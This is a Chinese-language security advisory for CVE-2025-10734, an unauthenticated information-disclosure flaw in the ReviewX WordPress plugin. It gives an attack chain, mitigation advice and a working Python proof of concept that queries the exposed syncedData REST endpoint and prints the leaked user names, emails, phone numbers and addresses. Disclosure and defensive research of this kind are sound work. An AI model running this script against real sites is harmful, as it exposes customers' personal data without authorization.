CVE-2025-10734 CVSS 5.3 中危

CVE-2025-10734 WordPress ReviewX插件信息泄露漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-10734

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ReviewX – WooCommerce Product Reviews Plugin

漏洞概述

WordPress插件ReviewX在所有版本（包括2.2.12及之前）中存在敏感信息泄露漏洞。该漏洞源于`syncedData`函数未对访问权限进行适当限制，允许未经身份验证的攻击者直接调用该接口。成功利用此漏洞可能导致攻击者窃取站点敏感数据，包括用户名、电子邮件地址、电话号码及物理地址等个人信息，对用户隐私构成严重威胁。

技术细节

该漏洞的根源在于WordPress插件开发过程中对REST API端点的权限配置不当。ReviewX插件在注册`syncedData`相关的REST路由时，未指定或未正确执行`permission_callback`，导致该端点默认公开可访问。当未授权的攻击者向该端点发起请求时，`DataSyncController`中的`syncedData`方法会被直接触发。该方法内部逻辑涉及从数据库中检索特定表格（如订单数据或评论数据关联的用户信息），并将其序列化为JSON格式返回。由于缺乏身份验证机制，攻击者无需登录后台即可遍历这些数据。这种利用方式简单直接，仅需发送HTTP请求即可完成攻击，极大地降低了攻击门槛。

攻击链分析

STEP 1

侦察

攻击者识别目标网站是否安装了ReviewX插件，并确认其版本号小于或等于2.2.12。

STEP 2

漏洞利用

攻击者向`/wp-json/reviewx/v1/syncedData`端点发送未经身份验证的HTTP GET请求。

STEP 3

数据获取

服务器返回包含敏感信息的JSON响应，攻击者解析数据以获取用户姓名、邮箱、电话和地址。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

def check_vulnerability(target_url):
    """
    Exploit for CVE-2025-10734 (Sensitive Information Exposure)
    This script attempts to fetch sensitive data from the syncedData endpoint.
    """
    # The endpoint path might vary based on plugin configuration, typically under wp-json
    endpoint = "/wp-json/reviewx/v1/syncedData"
    full_url = f"{target_url.rstrip('/')}{endpoint}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }

    try:
        response = requests.get(full_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Target is vulnerable: {full_url}")
            print("[+] Leaked Data:")
            try:
                data = response.json()
                print(json.dumps(data, indent=2))
            except json.JSONDecodeError:
                print(response.text)
        else:
            print(f"[-] Target appears not vulnerable or endpoint changed. Status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with the actual target URL
    check_vulnerability(target)

影响范围

ReviewX <= 2.2.12

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用ReviewX插件以阻断攻击面。或者通过Web服务器配置（如Apache的.htaccess或Nginx配置文件），限制对`/wp-json/reviewx/`路径的访问，仅允许受信任的IP地址或管理员访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表